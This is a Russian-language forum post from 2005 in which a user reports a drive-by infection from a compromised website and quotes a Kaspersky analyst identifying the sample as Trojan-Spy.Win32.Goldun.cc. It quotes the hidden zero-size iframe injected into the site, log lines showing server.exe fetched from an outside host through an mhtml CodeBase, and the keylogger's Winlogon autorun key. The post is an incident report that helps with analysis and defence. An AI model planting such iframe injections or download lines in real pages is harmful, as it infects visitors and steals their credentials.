Donatello
Silver Member | Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору
Здравствуйте.
Хотя у меня уже болит голова, глаза и я испереживался, попробую написать подробно... Я не могу понять, что это вообще такое. Сегодня (уже вчера) в 17:33 ко мне обратился знакомый человек по форуму и сказал, что с его сайтом что-то не то. Сайт у него уже до этого момента был полностью функционирующем на движке - sPaiz-Nuke (версия проверенная и довольно известная - общедоступная), проблема в том, что при открытии головной страницы в нижней строке браузера появлялся непонятный сайт - http://elizologistics.com/index.php и открывался его сайт - www.sky-team.ru с чистой белой страницей. Хостер его не знает в чём дело. Смотрели ns - серверы, прописаны правильные - его хостера, домен зарегистрирован на него... Так вот после загрузки его страницы, я открыл HTML - код страницы, там было прописано вот это:
<html>
<iframe src="http://elizologistics.com/index.php" width="0" height="0"></iframe>
</html>
Такого я никогда не видел, поэтому пошёл посмотреть, что за сайт (хотя, я думаю и до этого уже словил)... Сайт вроде приличный, как я понял занимается какими-то перевозками. Никакого отношения к таким вещам - трояны, шпионы, регистраторы доменов и т.п. иметь не должен.Так мы и не поняли, что это вообще такое и почему. Это было в 17:33, потом я не стал выключать компьютер полностью, а перевёл/выключил его в Спящий режим, то есть оперативная память записалась на жёсткий диск. Сейчас включил его и обратил внимание, что с браузером IE 6 что-то не то... Пропадают панели - тулбары - Робоформ - пропали значки, у другого вообще чёрные пятна вместо иконок. Тормозить начал, То появляются, то при новом окне опять пропадают. Стал просто завершать свою работу по много раз... Мне стало непонятно такое поведение, тем более ничего экстраординарного я не делал - не устанавливал программы, не лазил по подозр. сайтам и т.п.... Зашёл в C:\WINDOWS смотрю сегодня изменялся файл - setupapi.log, папка Downloaded Program Files, System32... Показалось странным это. Открыл файл - setupapi.log, а там вот это:
[2005/09/25 17:33:36 1600.1]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Program Files\Internet Explorer\hctmvefg.exe" в "C:\WINDOWS\Downloaded Program Files\hctmvefg.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Program Files\Internet Explorer\hctmvefg.exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:33:56 1600.2]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:34:28 1600.3]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:36:04 1600.4]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
В Downloaded Program Files уже ничего не было к тому моменту. Просканировал систему сканером с последними базами - ничего не показало, потом нашёл в папке временных файлов интернета - Temporary Internet Files этот файл server.exe - загружен он был с этого адреса - http://elizologistics.com/ , также проверил его с помощью Онлайн проверки, тоже ничего. Также в Temporary Internet Files с этого адреса ещё был файл - index.chm (12Кб) - файл справки Windows и пара HTML файлов и Флеш - все с этого сайта. Проверил утилитой Зайцева... Она показала вот это:
Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
C:\WINDOWS\System32\gdiwxp.dll --> Подозрение на Keylogger или троянскую DLL
C:\WINDOWS\System32\gdiwxp.dll>>> Нейросеть: файл с вероятностью 0.56% похож на типовой перехватчик событий клавиатуры/мыши
Также проверил этот файл - Онлайн, ничего. Открыл его PExplorer' ом, а там внутри... И e-gold.com, и пароли от браузера, почты, ICQ и т.п. Как я понял всё это хотят от меня. =) Также внутри этого файла (он ссылался на файл - tickcnt.bin), тоже увидел его в C:\WINDOWS\System32, вроде ничего там внутри интересного. Удалил gdiwxp.dll браузер вроде нормально заработал. Нашёл также откуда он будет загружаться, также утилита Зайцева показала:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gdiwxp
Удалил эту ветку. Потом пошёл в папку C:\Program Files\ , смотрю... А папка Internet Explorer сегодня изменялась, открываю, а там 4 файла без иконок по 12.7 Кб каждый... 
gsyzcjdr.exe hctmvefg.exe injwxtdg.exe xluqpnih.exe
Их тоже удалил. Время их создания 17:33, да и прописаны они в HTML файлах с этого сайта, типа такого:
<html><pre>
*** Code Download Log entry (25 Sep 2005 @ 17:36:05) ***
Code Download Error: (hr = 800714c7) В сетевом управляющем блоке (NCB) указан недопустимый номер имени.
NCB представляет данные.
Operation failed. Detailed Information:
CodeBase: mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
CLSID: {10000000-1000-0000-1000-000000000000}
Extension:
Type:
LOG: File C:\WINDOWS\Downloaded Program Files\server.exe being registered.
--- Detailed Error Log Follows ---
LOG: Download OnStopBinding called (hrStatus = 0 / hrResponseHdr = 0).
LOG: URL Download Complete: hrStatus:0, hrOSB:0, hrResponseHdr:0, URL mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe)
LOG: File C:\WINDOWS\Downloaded Program Files\server.exe being registered.
LOG: Setup successful installing: server.exe to (null) destination code(0)
WRN: OBJECT tags for CLASSID=10000000... have mixed usage with CODEBASE=file:///C:/Program%20Files/Internet%20Explorer/injwxtdg.exe and mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
LOG: Reporting Code Download Completion: (hr:800714c7 (FAILED), CLASSID: 10000000..., szCODEmhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe), MainTypenull), MainExtnull))
</pre></html>
После удаления этого руткита - gdiwxp.dll, он появился с новым именем - gdiw2k.dll, удалил только после перезагрузки.
Вообщем, я не знаю, что и думать... Помогите пожалуйста, скажите, что это за ситуация вообще с сайтом этого человека, и как полностью всё мне вычистить. И заразился ли я уже... То есть мои все пароли ту-ту? У меня на комп. очень много важной информации. Могло ли меня спасти, что он ещё не успел стартовать, а только прописался в автозагрузку? Так как я комп. не перезагружал с того момента... Я посылаю вам все эти файлы, а также страницы с этого... сайта. Там ещё правда Флеш есть на 300 Кб. но я думаю это из надписей - содержания, не имеют отношения к этому.
С уважением, Александр.
Здраствуйте!
Это Trojan-Spy.Win32.Goldun.cc
Детектирование будет добавлено в следующее обновление антивирусных баз.
Подождите ближайшего обновления антивирусных баз и просканируйте систему
еще раз. Я думаю найдется много чего интересного.
Посоветуйте проделать то же самое вашему знакомому.
А следующая строчка из Вашего лога:
CodeBase: mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
=====================
показывает, какой именно файл и откуда вы подцепили ("нужное подчеркнуть")
С уважением, Антон Дунаев
Вирусный аналитик
ЗАО "Лаборатория Касперского"
Тел/Факс: +7 (095) 797-8700
E-mail: newvirus@kaspersky.com
Internet: http://www.kaspersky.com, http://www.viruslist.com
----------
Манифест
Правда24
Лучше быть хорошим человеком, «ругающимся матом», чем тихой, воспитанной тварью. Ф.Г. Раневская |
|
Всего записей: 4303 | Зарегистр. 17-08-2003 | Отправлено: 05:00 26-09-2005 | Исправлено: Donatello, 05:05 26-09-2005 |
|
Я тебе в ПМ напиши... Просвещу уж Crazy administrator'а, раз такое дело. =)
